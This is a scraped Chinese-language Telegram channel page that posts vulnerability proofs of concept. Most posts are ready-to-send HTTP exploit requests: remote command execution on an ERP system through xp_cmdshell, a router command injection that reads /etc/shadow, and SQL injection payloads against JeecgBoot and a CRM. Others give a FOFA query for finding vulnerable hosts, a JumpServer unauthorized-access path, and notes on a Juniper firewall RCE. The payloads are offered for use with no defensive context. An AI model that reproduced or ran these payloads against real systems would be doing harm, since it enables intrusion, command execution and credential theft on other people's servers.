🔰黑盒-𝑩𝒍𝒂𝒄𝒌 𝑩𝑶𝑿-资源公开🅥(数据看文件)
46.4K subscribers
46 photos
8 videos
356 files
73 links
Download Telegram
💥💥💥💥💥💥💥💥💥💥💥💥💥💥💥💥💥💥💥💥💥💥💥💥💥💥💥💥💥💥
11
企望ERP系统 RCE
POST /mainFunctions/comboxstore.action HTTP/1.1
Host: ip:port
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 39

comboxsql=exec%20xp_cmdshell%20'whoami'
👍105
大家猜猜超索怎么被抓的?
👍14🤔94
JumpServer未授权访问漏洞 CVE-2023-42442

访问http://*url*/api/v1/terminal/sessions/
2👍2
移动路由器Cellular Router命令执行漏洞
FOFA搜索语句
title="index" && header="lighttpd/1.4.30"

GET /cgi-bin/popen.cgi?command=ping%20-c%204%201.1.1.1;cat%20/etc/shadow&v=0.1303033443137912 HTTP/1.1
Host: x.x.x.x
👍64😁1
Juniper 防火墙RCE
非常有意思的一个漏洞
Juniper 防火墙使用Appweb Web 服务器。当Appweb调用CGI脚本时,它会传递各种环境变量和参数,以便脚本可以访问用户的HTTP请求。HTTP 请求的正文通过 stdin 传递。受影响的防火墙运行 FreeBSD,每个 FreeBSD 进程都可以通过打开/dev/fd/0. 通过发送 HTTP 请求,我们能够/dev/fd/0向系统引入一个“文件”。

https://github.com/vulncheck-oss/cve-2023-36845-scanner
细节
https://vulncheck.com/blog/juniper-cve-2023-36845/
9👍9
JeecgBoot-企业级低代码平台 qurestSql SQL注入

POST /jeecg-boot/jmreport/qurestSql HTTP/1.1
Host:
Content-Type: application/json;charset=UTF-8

{"apiSelectId":"1316997232402231298","id":"1' or '%1%' like (updatexml(0x3a,concat(1,(select current_user)),1)) or '%%' like '"}
👍84
安恒信息CERT监测到一起LNMP遭受供应链投毒攻击事件

近日,安恒信息 CERT 监测到一起 LNMP 遭受供应链投毒攻击事件。我们发现,在 lnmp.org 官方网站下载的安装包中被植入了恶意程序。至今,大部分威胁情报平台尚未标记相关的恶意 IoC 情报。建议近期在 lnmp.org 官网下载并部署 LNMP 的 RedHat 系统用户进行自查。

—— 安恒信息微信公众号
14👍11😁1
畅捷CRM get_usedspace.php SQL注入漏洞 poc

GET /WebSer~1/get_usedspace.php?site_id=-1159%20UNION%20ALL%20SELECT%20CONCAT(0x7178767671,0x5664726e476a637a565a50614d4c435745446a50614756506d486d58544b4e646d7a577170685165,0x7171626b71)-- HTTP/1.1
Host: x.x.x.x
👍1712